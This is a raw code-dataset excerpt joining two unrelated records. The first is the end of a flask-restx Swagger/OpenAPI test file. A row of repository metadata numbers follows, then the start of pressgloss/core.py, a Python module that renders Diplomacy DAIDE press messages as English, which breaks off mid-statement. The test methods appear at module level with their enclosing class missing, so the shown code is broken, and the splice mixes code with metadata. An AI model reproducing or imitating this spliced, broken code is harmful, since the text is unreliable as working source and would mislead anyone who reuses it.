    specs = client.get_specs()
    for operation in specs["paths"]["/test/"].values():
        assert operation["deprecated"] is True
def test_deprecated_method(self, api, client):
    """@api.deprecated on a single method marks only that operation deprecated."""

    @api.route("/test/", endpoint="test")
    class TestResource(restx.Resource):
        def get(self):
            pass

        @api.deprecated
        def post(self):
            pass

    specs = client.get_specs()
    assert "deprecated" not in specs["paths"]["/test/"]["get"]
    post_op = specs["paths"]["/test/"]["post"]
    assert post_op["deprecated"] is True
def test_vendor_as_kwargs(self, api, client):
    """@api.vendor keyword arguments become x-prefixed extension fields."""

    @api.route("/vendor_fields", endpoint="vendor_fields")
    class TestResource(restx.Resource):
        @api.vendor(integration={"integration1": "1"})
        def get(self):
            return {}

    specs = client.get_specs()
    assert "/vendor_fields" in specs["paths"]
    get_op = specs["paths"]["/vendor_fields"]["get"]
    assert get_op["x-integration"] == {"integration1": "1"}
def test_vendor_as_dict(self, api, client):
    """@api.vendor dict arguments are merged; missing x- prefixes are added."""

    @api.route("/vendor_fields", endpoint="vendor_fields")
    class TestResource(restx.Resource):
        @api.vendor(
            {
                "x-some-integration": {"integration1": "1"},
                "another-integration": True,
            },
            {"third-integration": True},
        )
        def get(self, age):
            return {}

    specs = client.get_specs()
    assert "/vendor_fields" in specs["paths"]
    get_op = specs["paths"]["/vendor_fields"]["get"]
    assert get_op["x-some-integration"] == {"integration1": "1"}
    assert get_op["x-another-integration"] is True
    assert get_op["x-third-integration"] is True
def test_method_restrictions(self, api, client):
    """methods=[...] on a route restricts which operations are documented for it."""

    @api.route("/foo/bar", endpoint="foo")
    @api.route("/bar", methods=["GET"], endpoint="bar")
    class TestResource(restx.Resource):
        def get(self):
            pass

        def post(self):
            pass

    specs = client.get_specs()
    unrestricted = specs["paths"]["/foo/bar"]
    assert "get" in unrestricted
    assert "post" in unrestricted
    restricted = specs["paths"]["/bar"]
    assert "get" in restricted
    assert "post" not in restricted
def test_multiple_routes_inherit_doc(self, api, client):
    """Class-level @api.doc applies to every route of a multi-routed resource."""

    @api.route("/foo/bar")
    @api.route("/bar")
    @api.doc(description="an endpoint")
    class TestResource(restx.Resource):
        def get(self):
            pass

    specs = client.get_specs()
    for route in ("/foo/bar", "/bar"):
        assert specs["paths"][route]["get"]["description"] == "an endpoint"
def test_multiple_routes_individual_doc(self, api, client):
    """Per-route doc dicts document each route independently."""

    @api.route("/foo/bar", doc={"description": "the same endpoint"})
    @api.route("/bar", doc={"description": "an endpoint"})
    class TestResource(restx.Resource):
        def get(self):
            pass

    specs = client.get_specs()
    assert specs["paths"]["/foo/bar"]["get"]["description"] == "the same endpoint"
    assert specs["paths"]["/bar"]["get"]["description"] == "an endpoint"
def test_multiple_routes_override_doc(self, api, client):
    """Per-route doc overrides class-level @api.doc only for that route."""

    @api.route("/foo/bar", doc={"description": "the same endpoint"})
    @api.route("/bar")
    @api.doc(description="an endpoint")
    class TestResource(restx.Resource):
        def get(self):
            pass

    specs = client.get_specs()
    assert specs["paths"]["/foo/bar"]["get"]["description"] == "the same endpoint"
    assert specs["paths"]["/bar"]["get"]["description"] == "an endpoint"
def test_multiple_routes_no_doc_same_operationIds(self, api, client):
    """Without per-route docs, every route shares one operationId."""

    @api.route("/foo/bar")
    @api.route("/bar")
    class TestResource(restx.Resource):
        def get(self):
            pass

    specs = client.get_specs()
    expected_operation_id = "get_test_resource"
    for route in ("/foo/bar", "/bar"):
        assert specs["paths"][route]["get"]["operationId"] == expected_operation_id
def test_multiple_routes_with_doc_unique_operationIds(self, api, client):
    """A route with its own doc dict gets a route-suffixed, unique operationId."""

    @api.route(
        "/foo/bar", doc={"description": "I should be treated separately"},
    )
    @api.route("/bar")
    class TestResource(restx.Resource):
        def get(self):
            pass

    specs = client.get_specs()
    documented = specs["paths"]["/foo/bar"]
    assert documented["get"]["operationId"] == "get_test_resource_/foo/bar"
    undocumented = specs["paths"]["/bar"]
    assert undocumented["get"]["operationId"] == "get_test_resource"
# Renamed from test_mutltiple_routes_merge_doc: fixed the "mutltiple" typo in the
# test name; test discovery is unaffected since the name still matches test_*.
def test_multiple_routes_merge_doc(self, api, client):
    """Per-route doc merges with class-level doc; description=False suppresses it."""

    @api.route("/foo/bar", doc={"description": "the same endpoint"})
    @api.route("/bar", doc={"description": False})
    @api.doc(security=[{"oauth2": ["read", "write"]}])
    class TestResource(restx.Resource):
        def get(self):
            pass

    specs = client.get_specs()
    documented = specs["paths"]["/foo/bar"]
    assert documented["get"]["description"] == "the same endpoint"
    assert documented["get"]["security"] == [{"oauth2": ["read", "write"]}]
    suppressed = specs["paths"]["/bar"]
    # description=False removes the description but class-level security still merges in.
    assert "description" not in suppressed["get"]
    assert suppressed["get"]["security"] == [{"oauth2": ["read", "write"]}]
def test_multiple_routes_deprecation(self, api, client):
    """doc={"deprecated": True} deprecates only the route that declares it."""

    @api.route("/foo/bar", doc={"deprecated": True})
    @api.route("/bar")
    class TestResource(restx.Resource):
        def get(self):
            pass

    specs = client.get_specs()
    assert specs["paths"]["/foo/bar"]["get"]["deprecated"] is True
    assert "deprecated" not in specs["paths"]["/bar"]["get"]
@pytest.mark.parametrize("path_name", ["/name/{age}/", "/first-name/{age}/"])
def test_multiple_routes_explicit_parameters_override(self, path_name, api, client):
    """Class-level param docs land on path/method parameters and are overridable per method."""

    @api.route("/name/<int:age>/", endpoint="by-name")
    @api.route("/first-name/<int:age>/")
    @api.doc(
        params={
            "q": {
                "type": "string",
                "in": "query",
                "description": "Overriden description",
            },
            "age": {"description": "An age"},
        }
    )
    class ByNameResource(restx.Resource):
        @api.doc(params={"q": {"description": "A query string"}})
        def get(self, age):
            return {}

        def post(self, age):
            pass

    specs = client.get_specs()
    assert path_name in specs["paths"]
    path_item = specs["paths"][path_name]

    # Only the URL parameter is documented at path level; "q" is not duplicated there.
    assert len(path_item["parameters"]) == 1
    by_name = {p["name"]: p for p in path_item["parameters"]}
    assert "q" not in by_name
    age_param = by_name["age"]
    assert age_param["name"] == "age"
    assert age_param["type"] == "integer"
    assert age_param["in"] == "path"
    assert age_param["required"] is True
    assert age_param["description"] == "An age"

    # get overrides the class-level description for "q".
    get_op = path_item["get"]
    assert len(get_op["parameters"]) == 1
    q_param = get_op["parameters"][0]
    assert q_param["name"] == "q"
    assert q_param["type"] == "string"
    assert q_param["in"] == "query"
    assert q_param["description"] == "A query string"

    # post keeps the class-level description.
    post_op = path_item["post"]
    assert len(post_op["parameters"]) == 1
    q_param = post_op["parameters"][0]
    assert q_param["name"] == "q"
    assert q_param["type"] == "string"
    assert q_param["in"] == "query"
    assert q_param["description"] == "Overriden description"
class SwaggerDeprecatedTest(object):
    """Deprecated documentation APIs: each should warn and be rewritten to ``expect``."""

    def test_doc_parser_parameters(self, api):
        """@api.doc(parser=...) warns and is translated to an expect entry."""
        parser = api.parser()
        parser.add_argument("param", type=int, help="Some param")

        with pytest.warns(DeprecationWarning):

            @api.route("/with-parser/")
            class WithParserResource(restx.Resource):
                @api.doc(parser=parser)
                def get(self):
                    return {}

        apidoc = WithParserResource.get.__apidoc__
        assert "parser" not in apidoc
        assert "expect" in apidoc
        assert apidoc["expect"][0].__schema__ == parser.__schema__

    def test_doc_method_parser_on_class(self, api):
        """A per-method parser given on the class is also rewritten to expect."""
        parser = api.parser()
        parser.add_argument("param", type=int, help="Some param")

        with pytest.warns(DeprecationWarning):

            @api.route("/with-parser/")
            @api.doc(get={"parser": parser})
            class WithParserResource(restx.Resource):
                def get(self):
                    return {}

                def post(self):
                    return {}

        get_doc = WithParserResource.__apidoc__["get"]
        assert "parser" not in get_doc
        assert "expect" in get_doc
        assert get_doc["expect"][0].__schema__ == parser.__schema__

    def test_doc_body_as_tuple(self, api):
        """@api.doc(body=(model, desc)) warns and moves the tuple into expect."""
        fields = api.model(
            "Person",
            {
                "name": restx.fields.String,
                "age": restx.fields.Integer,
                "birthdate": restx.fields.DateTime,
            },
        )

        with pytest.warns(DeprecationWarning):

            @api.route("/model-as-dict/")
            class ModelAsDict(restx.Resource):
                @api.doc(body=(fields, "Body description"))
                def post(self):
                    return {}

        assert "body" not in ModelAsDict.post.__apidoc__
        assert ModelAsDict.post.__apidoc__["expect"] == [(fields, "Body description")]

    def test_build_request_body_parameters_schema(self):
        """Body-located reqparse arguments are folded into one payload schema."""
        parser = restx.reqparse.RequestParser()
        parser.add_argument("test", type=int, location="headers")
        parser.add_argument("test1", type=int, location="json")
        parser.add_argument("test2", location="json")

        body_params = [p for p in parser.__schema__ if p["in"] == "body"]
        result = restx.swagger.build_request_body_parameters_schema(body_params)

        assert result["name"] == "payload"
        assert result["required"]
        assert result["in"] == "body"
        schema = result["schema"]
        assert schema["type"] == "object"
        # Only json-located args appear; headers-located "test" is excluded.
        assert schema["properties"]["test1"]["type"] == "integer"
        assert schema["properties"]["test2"]["type"] == "string"
| 32.324946
| 112
| 0.50702
| 10,340
| 105,347
| 5.082302
| 0.038008
| 0.042816
| 0.029933
| 0.040418
| 0.845788
| 0.801735
| 0.766246
| 0.72756
| 0.705695
| 0.682118
| 0
| 0.008006
| 0.331305
| 105,347
| 3,258
| 113
| 32.334868
| 0.73798
| 0.011391
| 0
| 0.690597
| 0
| 0.00078
| 0.199236
| 0.005964
| 0
| 0
| 0
| 0
| 0.228638
| 1
| 0.106516
| false
| 0.011315
| 0.002731
| 0.040968
| 0.201327
| 0.003512
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ed4b642428eb17107bf42c5f17225efe9382aa11
| 148,999
|
py
|
Python
|
pressgloss/core.py
|
jpowersdevtech/pressgloss
|
dba7f97c8b00db04da54ef79022553ff06fa0737
|
[
"BSD-2-Clause-FreeBSD"
] | 2
|
2022-02-03T17:09:56.000Z
|
2022-02-07T19:21:15.000Z
|
pressgloss/core.py
|
jpowersdevtech/pressgloss
|
dba7f97c8b00db04da54ef79022553ff06fa0737
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
pressgloss/core.py
|
jpowersdevtech/pressgloss
|
dba7f97c8b00db04da54ef79022553ff06fa0737
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
# -*- coding: utf-8 -*-
"""%pressgloss% library"""
# Standard library imports
import logging
import random
# pressgloss imports
from . import helpers
class PressUtterance:
    """ A statement by a Diplomacy Power addressed to other Powers and regarding some in-game topic with a tone """

    def __init__(self, daide='', tones=None):  # type: (str, []) -> None
        """
        Initialize the utterance with a DAIDE expression.

        An empty or missing expression triggers random generation of a sender,
        1-4 distinct recipients and a random content message; otherwise the
        expression is parsed (expected shape: FRM (power) (powers) (message)).

        :param daide: the press utterance in DAIDE syntax
        :type daide: str
        :param tones: the tones to use when forming English
        :type tones: []
        """
        if tones is None:
            self.tones = []
        else:
            self.tones = tones
        if daide is None or daide == '':
            # No expression given: fabricate a random utterance.
            self.frompower = random.choice(helpers.powerlist)
            self.topowers = []
            # Recipients are any powers other than the sender.
            tolist = [curpower for curpower in helpers.powerlist if curpower != self.frompower]
            self.topowers = random.sample(tolist, random.randint(1, 4))
            contentword = random.choice(['PRP', 'FCT', 'YES', 'REJ', 'HUH', 'BWX', 'CCL'])
            self.content = randomFactory(self, None, contentword)
            self.daide = self.formDAIDE()
        else:
            self.daide = daide
            thelists = helpers.daide2lists(daide)
            if len(thelists) == 4 and thelists[0] == 'FRM':
                self.frompower = thelists[1][0]
                self.topowers = thelists[2]
                self.content = messageFactory(self, None, thelists[3])
            else:
                # Unparseable input: leave the utterance contentless.
                self.frompower = ''
                self.topowers = []
                self.content = None
        # Pre-compute the English rendering with the initial tones.
        self.formenglish()

    def __eq__(self, other):  # type: (PressUtterance) -> bool
        """
        Override default equality with a case-insensitive comparison of DAIDE expressions.

        :param other: the other utterance to compare
        :type other: PressUtterance
        :return: if these utterances are equal
        :rtype: bool
        """
        return self.daide.lower() == other.daide.lower()

    def __ne__(self, other):  # type: (PressUtterance) -> bool
        """
        Override default inequality with reference to equality.

        :param other: the other utterance to compare
        :type other: PressUtterance
        :return: if these utterances are not equal
        :rtype: bool
        """
        return not self.__eq__(other)

    def formenglish(self, tones=None):  # type: ([]) -> None
        """
        Creates an English expression either using the initial tones or a given new set.
        Stores the English in the object as the 'english' attribute.

        :param tones: the tones to use when forming English; a non-empty list replaces self.tones
        :type tones: []
        """
        if tones is not None and len(tones) > 0:
            self.tones = tones
        if self.content is None:
            # Contentless utterance (unparseable DAIDE) falls back to a filler word.
            self.english = 'Ahem.'
        else:
            self.english = self.content.formenglish()

    def formDAIDE(self):  # type: () -> str
        """
        Create a DAIDE representation of this Utterance.

        :return: the DAIDE message, shaped FRM (sender) (recipients) (content)
        :rtype: str
        """
        return 'FRM (' + self.frompower + ') (' + ' '.join(self.topowers) + ') (' + self.content.formDAIDE() + ')'
class PressMessage:
    """ The game-related content of an utterance. Top-level DAIDE class that should never be used directly. """

    def __init__(self, utterance, container):  # type: (PressUtterance, PressMessage) -> None
        """
        Initialize the message with an utterance.

        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one, or None for the outermost message
        :type container: PressMessage
        """
        self.utterance = utterance
        self.container = container
        # Subclasses overwrite these with their DAIDE operator and nested content.
        self.operator = ''
        self.details = None
        self.english = 'Ahem.'

    def __eq__(self, other):  # type: (PressMessage) -> bool
        """
        Override default equality with a case-insensitive comparison of the
        owning utterances' DAIDE expressions.

        :param other: the other message to compare
        :type other: PressMessage
        :return: if these messages are equal
        :rtype: bool
        """
        return self.utterance.daide.lower() == other.utterance.daide.lower()

    def __ne__(self, other):  # type: (PressMessage) -> bool
        """
        Override default inequality with reference to equality.

        :param other: the other message to compare
        :type other: PressMessage
        :return: if these messages are not equal
        :rtype: bool
        """
        return not self.__eq__(other)

    def formenglish(self):  # type: () -> str
        """
        Creates an English expression in the context of a sender, recipients and desired tone.
        Base implementation tonetizes the current 'english' attribute ('Ahem.' by default).

        :return: the English expression
        :rtype: str
        """
        self.english = helpers.tonetize(self.utterance, self.english)
        return self.english

    def formsimpleenglish(self):  # type: () -> str
        """
        Creates a simple English statement, without any context like proposals, negations, etc.
        Useful for lists of conjunctions or other contexts in which simplicity is valued over flavor.
        Base implementation returns a generic placeholder.

        :return: the simple English statement
        :rtype: str
        """
        self.simpleenglish = 'A DAIDE expression.'
        return self.simpleenglish

    def formDAIDE(self):  # type: () -> str
        """
        Create a DAIDE representation of this Message.
        Base implementation returns only the operator token.

        :return: the DAIDE message
        :rtype: str
        """
        return self.operator
class PressFact(PressMessage):
    """ The game-related content of a fact (FCT). """

    def __init__(self, utterance, container, thelists):  # type: (PressUtterance, PressMessage, []) -> None
        """
        Initialize the message with an utterance.

        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one
        :type container: PressMessage
        :param thelists: the parsed, nested DAIDE statement; empty/None triggers random generation
        :type thelists: []
        """
        super().__init__(utterance, container)
        if thelists is None or len(thelists) == 0:
            # No parsed content: fabricate a random fact body.
            self.operator = 'FCT'
            contentword = random.choice(['PCE', 'ALY', 'DMZ', 'SLO', 'DRW', 'XDO', 'NOT', 'NAR', 'AND', 'ORR', 'IFF'])
            self.details = randomFactory(utterance, self, contentword)
        elif len(thelists) == 2:
            self.operator = thelists[0]
            self.details = messageFactory(utterance, self, thelists[1])
        # For any other list length self.details stays None; the methods below
        # fall back to the base-class behavior in that case.

    def formenglish(self):  # type: () -> str
        """
        Creates an English expression about the fact in the context of a sender, recipients and desired tone.

        :return: the English expression
        :rtype: str
        """
        if self.details is None:
            return super().formenglish()
        self.english = self.details.formenglish()
        if self.container is None:
            # Only the outermost message applies tone decoration.
            self.english = helpers.tonetize(self.utterance, self.english)
        return self.english

    def formsimpleenglish(self):  # type: () -> str
        """
        Creates a simple English statement, without any context like proposals, negations, etc.
        Useful for lists of conjunctions or other contexts in which simplicity is valued over flavor.

        :return: the simple English statement
        :rtype: str
        """
        # Guard a contentless fact instead of raising AttributeError on None,
        # mirroring the guard formenglish() already has.
        if self.details is None:
            return super().formsimpleenglish()
        self.simpleenglish = self.details.formsimpleenglish()
        return self.simpleenglish

    def formDAIDE(self):  # type: () -> str
        """
        Create a DAIDE representation of this Message.

        :return: the DAIDE message
        :rtype: str
        """
        # Same None guard as above; falls back to the bare operator token.
        if self.details is None:
            return super().formDAIDE()
        return 'FCT (' + self.details.formDAIDE() + ')'
class PressProposal(PressMessage):
    """ The game-related content of a proposal (PRP). """

    def __init__(self, utterance, container, thelists):  # type: (PressUtterance, PressMessage, []) -> None
        """
        Initialize the message with an utterance.

        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one
        :type container: PressMessage
        :param thelists: the parsed, nested DAIDE statement; empty/None triggers random generation
        :type thelists: []
        """
        super().__init__(utterance, container)
        if thelists is None or len(thelists) == 0:
            # No parsed content: fabricate a random proposal body.
            self.operator = 'PRP'
            contentword = random.choice(['PCE', 'ALY', 'DMZ', 'SLO', 'DRW', 'XDO', 'NOT', 'NAR', 'AND', 'ORR', 'IFF'])
            self.details = randomFactory(utterance, self, contentword)
        elif len(thelists) == 2:
            self.operator = thelists[0]
            self.details = messageFactory(utterance, self, thelists[1])
        # For any other list length self.details stays None; the methods below
        # fall back to the base-class behavior in that case.

    def formenglish(self):  # type: () -> str
        """
        Creates an English expression about the proposal in the context of a sender, recipients and desired tone.

        :return: the English expression
        :rtype: str
        """
        if self.details is None:
            return super().formenglish()
        self.english = self.details.formenglish()
        if self.container is None:
            # Only the outermost message applies tone decoration.
            self.english = helpers.tonetize(self.utterance, self.english)
        return self.english

    def formsimpleenglish(self):  # type: () -> str
        """
        Creates a simple English statement, without any context like proposals, negations, etc.
        Useful for lists of conjunctions or other contexts in which simplicity is valued over flavor.

        :return: the simple English statement
        :rtype: str
        """
        # Guard a contentless proposal instead of raising AttributeError on None,
        # mirroring the guard formenglish() already has.
        if self.details is None:
            return super().formsimpleenglish()
        self.simpleenglish = self.details.formsimpleenglish()
        return self.simpleenglish

    def formDAIDE(self):  # type: () -> str
        """
        Create a DAIDE representation of this Message.

        :return: the DAIDE message
        :rtype: str
        """
        # Same None guard as above; falls back to the bare operator token.
        if self.details is None:
            return super().formDAIDE()
        return 'PRP (' + self.details.formDAIDE() + ')'
class PressAccept(PressMessage):
    """ The game-related content of an acceptance (YES). """

    def __init__(self, utterance, container, thelists):  # type: (PressUtterance, PressMessage, []) -> None
        """
        Initialize the message with an utterance.

        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one
        :type container: PressMessage
        :param thelists: the parsed, nested DAIDE statement; empty/None triggers random generation
        :type thelists: []
        """
        super().__init__(utterance, container)
        if thelists is None or len(thelists) == 0:
            # An acceptance always wraps a proposal; fabricate one randomly.
            self.operator = 'YES'
            self.details = randomFactory(utterance, self, 'PRP')
        elif len(thelists) == 2:
            self.operator = thelists[0]
            self.details = messageFactory(utterance, self, thelists[1])
        # NOTE(review): for any other list length self.details stays None and
        # formDAIDE() below would raise AttributeError - confirm inputs are
        # always 0- or 2-element lists.

    def formenglish(self):  # type: () -> str
        """
        Creates an English expression about the acceptance in the context of a sender, recipients and desired tone.

        :return: the English expression
        :rtype: str
        """
        if self.details is None:
            return super().formenglish()
        self.english = self.details.formenglish()
        if self.container is None:
            # Only the outermost message applies tone decoration.
            self.english = helpers.tonetize(self.utterance, self.english)
        return self.english

    def formsimpleenglish(self):  # type: () -> str
        """
        Creates a simple English statement, without any context like proposals, negations, etc.
        Useful for lists of conjunctions or other contexts in which simplicity is valued over flavor.

        :return: the simple English statement
        :rtype: str
        """
        self.simpleenglish = 'I accept your proposal.'
        return self.simpleenglish

    def formDAIDE(self):  # type: () -> str
        """
        Create a DAIDE representation of this Message.

        :return: the DAIDE message
        :rtype: str
        """
        return 'YES (' + self.details.formDAIDE() + ')'
class PressReject(PressMessage):
    """ The game-related content of a rejection. """

    def __init__(self, utterance, container, thelists):  # type: (PressUtterance, PressMessage, []) -> None
        """
        Initialize the rejection from a parsed DAIDE statement.

        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one
        :type container: PressMessage
        :param thelists: the parsed, nested DAIDE statement
        :type thelists: []
        """
        super().__init__(utterance, container)
        if not thelists:
            # No parsed content supplied: reject a randomly generated proposal.
            self.operator = 'REJ'
            self.details = randomFactory(utterance, self, 'PRP')
        elif len(thelists) == 2:
            # thelists holds [operator, nested-statement]; parse the inner message.
            self.operator = thelists[0]
            self.details = messageFactory(utterance, self, thelists[1])

    def formenglish(self):  # type: () -> str
        """
        Creates an English expression about the rejection in the context of a sender, recipients and desired tone.

        :return: the English expression
        :rtype: str
        """
        if self.details is None:
            return super().formenglish()
        phrased = self.details.formenglish()
        if self.container is None:
            # Outermost message: color the wording with the utterance's tone.
            phrased = helpers.tonetize(self.utterance, phrased)
        self.english = phrased
        return self.english

    def formsimpleenglish(self):  # type: () -> str
        """
        Creates a simple English statement, without any context like proposals, negations, etc.
        Useful for lists of conjunctions or other contexts in which simplicity is valued over flavor.

        :return: the simple English statement
        :rtype: str
        """
        simple = 'I reject your proposal.'
        self.simpleenglish = simple
        return simple

    def formDAIDE(self):  # type: () -> str
        """
        Create a DAIDE representation of this Message.

        :return: the DAIDE message
        :rtype: str
        """
        return 'REJ ({0})'.format(self.details.formDAIDE())
class PressCancel(PressMessage):
    """ The game-related content of a cancellation. """

    def __init__(self, utterance, container, thelists):  # type: (PressUtterance, PressMessage, []) -> None
        """
        Initialize the cancellation from a parsed DAIDE statement.

        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one
        :type container: PressMessage
        :param thelists: the parsed, nested DAIDE statement
        :type thelists: []
        """
        super().__init__(utterance, container)
        if not thelists:
            # No parsed content supplied: cancel a randomly generated proposal.
            self.operator = 'CCL'
            self.details = randomFactory(utterance, self, 'PRP')
        elif len(thelists) == 2:
            # thelists holds [operator, nested-statement]; parse the inner message.
            self.operator = thelists[0]
            self.details = messageFactory(utterance, self, thelists[1])

    def formenglish(self):  # type: () -> str
        """
        Creates an English expression about the cancellation in the context of a sender, recipients and desired tone.

        :return: the English expression
        :rtype: str
        """
        if self.details is None:
            return super().formenglish()
        phrased = self.details.formenglish()
        if self.container is None:
            # Outermost message: color the wording with the utterance's tone.
            phrased = helpers.tonetize(self.utterance, phrased)
        self.english = phrased
        return self.english

    def formsimpleenglish(self):  # type: () -> str
        """
        Creates a simple English statement, without any context like proposals, negations, etc.
        Useful for lists of conjunctions or other contexts in which simplicity is valued over flavor.

        :return: the simple English statement
        :rtype: str
        """
        simple = 'I wish to cancel my last message.'
        self.simpleenglish = simple
        return simple

    def formDAIDE(self):  # type: () -> str
        """
        Create a DAIDE representation of this Message.

        :return: the DAIDE message
        :rtype: str
        """
        return 'CCL ({0})'.format(self.details.formDAIDE())
class PressHuh(PressMessage):
    """ The game-related content of a confusion. """

    def __init__(self, utterance, container, thelists):  # type: (PressUtterance, PressMessage, []) -> None
        """
        Initialize the confusion from a parsed DAIDE statement.

        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one
        :type container: PressMessage
        :param thelists: the parsed, nested DAIDE statement
        :type thelists: []
        """
        super().__init__(utterance, container)
        if not thelists:
            # No parsed content supplied: be confused by a random proposal or fact.
            self.operator = 'HUH'
            self.details = randomFactory(utterance, self, random.choice(['PRP', 'FCT']))
        elif len(thelists) == 2:
            # thelists holds [operator, nested-statement]; parse the inner message.
            self.operator = thelists[0]
            self.details = messageFactory(utterance, self, thelists[1])

    def formenglish(self):  # type: () -> str
        """
        Creates an English expression about the confusion in the context of a sender, recipients and desired tone.

        Note that, unlike the other reply types, no tone is applied here.

        :return: the English expression
        :rtype: str
        """
        inner = self.details
        if inner is None:
            return super().formenglish()
        self.english = inner.formenglish()
        return self.english

    def formsimpleenglish(self):  # type: () -> str
        """
        Creates a simple English statement, without any context like proposals, negations, etc.
        Useful for lists of conjunctions or other contexts in which simplicity is valued over flavor.

        :return: the simple English statement
        :rtype: str
        """
        simple = 'I did not understand your message.'
        self.simpleenglish = simple
        return simple

    def formDAIDE(self):  # type: () -> str
        """
        Create a DAIDE representation of this Message.

        :return: the DAIDE message
        :rtype: str
        """
        return 'HUH ({0})'.format(self.details.formDAIDE())
class PressIgnore(PressMessage):
    """ The game-related content of an ignoring. """

    def __init__(self, utterance, container, thelists):  # type: (PressUtterance, PressMessage, []) -> None
        """
        Initialize the ignoring from a parsed DAIDE statement.

        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one
        :type container: PressMessage
        :param thelists: the parsed, nested DAIDE statement
        :type thelists: []
        """
        super().__init__(utterance, container)
        if not thelists:
            # No parsed content supplied: ignore a randomly generated proposal.
            self.operator = 'BWX'
            self.details = randomFactory(utterance, self, 'PRP')
        elif len(thelists) == 2:
            # thelists holds [operator, nested-statement]; parse the inner message.
            self.operator = thelists[0]
            self.details = messageFactory(utterance, self, thelists[1])

    def formenglish(self):  # type: () -> str
        """
        Creates an English expression about the ignoring in the context of a sender, recipients and desired tone.

        :return: the English expression
        :rtype: str
        """
        # Half the time the ignoring is total silence; otherwise a narrated snub.
        if random.choice([True, False]):
            self.english = ''
        else:
            who = helpers.powerdict[self.utterance.frompower]['Objective']
            self.english = who + ' ignores you.'
        return self.english

    def formsimpleenglish(self):  # type: () -> str
        """
        Creates a simple English statement, without any context like proposals, negations, etc.
        Useful for lists of conjunctions or other contexts in which simplicity is valued over flavor.

        :return: the simple English statement
        :rtype: str
        """
        simple = self.formenglish()
        self.simpleenglish = simple
        return simple

    def formDAIDE(self):  # type: () -> str
        """
        Create a DAIDE representation of this Message.

        :return: the DAIDE message
        :rtype: str
        """
        return 'BWX ({0})'.format(self.details.formDAIDE())
class PressPeace(PressMessage):
    """ The game-related content of a peace treaty (DAIDE PCE). """
    def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
        """
        Initialize the message with an utterance
        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one
        :type container: PressMessage
        :param thelists: the parsed, nested DAIDE statement
        :type thelists: []
        """
        super().__init__(utterance, container)
        if thelists is None or len(thelists) == 0:
            # No parsed DAIDE: invent allies at random.  2-in-3 chance the treaty
            # covers exactly the conversation participants; otherwise sample 2-4 powers.
            self.operator = 'PCE'
            if random.choice([True, True, False]):
                self.allies = [curpower for curpower in helpers.powerlist if curpower in utterance.topowers or curpower == utterance.frompower]
            else:
                self.allies = random.sample(helpers.powerlist, random.randint(2, 4))
        elif len(thelists) == 2:
            # thelists is [operator, list-of-ally-powers]
            self.operator = thelists[0]
            self.allies = thelists[1]
    def formenglish(self): # type: () -> str
        """
        Creates an English expression about the peace treaty in the context of a sender, recipients and desired tone.

        The wording is chosen by inspecting the chain of containing messages
        (e.g. PCE inside PRP inside YES reads as agreement to a proposed peace),
        with random synonym choices for variety.
        NOTE(review): 'non-agression' below is misspelled in the generated text;
        left unchanged here because fixing it would alter runtime output.
        NOTE(review): if no branch matches, self.english may keep a stale value —
        confirm every reachable container chain is covered.

        :return: the English expression
        :rtype: str
        """
        if self.container.operator == 'PRP':
            # (PRP (PCE
            if self.container.container is None:
                if random.choice([True, False]):
                    self.english = 'I ' + random.choice(['propose', 'request', 'offer']) + \
                        ' a ' + random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + \
                        ' between ' + helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers) + '.'
                else:
                    self.english = 'I ' + random.choice(['propose', 'request']) + ' that ' + \
                        helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
                        random.choice(['form', 'sign', 'agree to', 'establish']) + ' a ' + \
                        random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + '.'
            # (YES (PRP (PCE
            elif self.container.container.operator == 'YES':
                self.english = 'I ' + random.choice(['agree to', 'concur with', 'would appreciate']) + ' a ' + \
                    random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + \
                    ' between ' + helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers) + '.'
            # (REJ (PRP (PCE
            elif self.container.container.operator == 'REJ':
                self.english = 'I ' + random.choice(['reject', 'do not concur with', 'do not approve of']) + ' a ' + \
                    random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + \
                    ' between ' + helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers) + '.'
            # (CCL (PRP (PCE
            elif self.container.container.operator == 'CCL':
                self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal of a ' + \
                    random.choice(['peace treaty', 'peace deal', 'non-agression pact', 'cease-fire']) + \
                    ' between ' + helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers) + '.'
            # (HUH (PRP (PCE
            elif self.container.container.operator == 'HUH':
                self.english = 'I do not understand your peace proposal.'
        elif self.container.operator == 'NOT':
            if self.container.container.operator == 'PRP':
                # (PRP (NOT (PCE
                if self.container.container.container is None:
                    self.english = 'I ' + random.choice(['propose', 'request']) + ' that ' + \
                        helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Subjective') + ' ' + \
                        random.choice(['break', 'cancel', 'annul']) + ' ' + \
                        helpers.listOfPowers(self.allies, self.utterance.frompower, self.utterance.topowers, case='Possessive') + ' ' + \
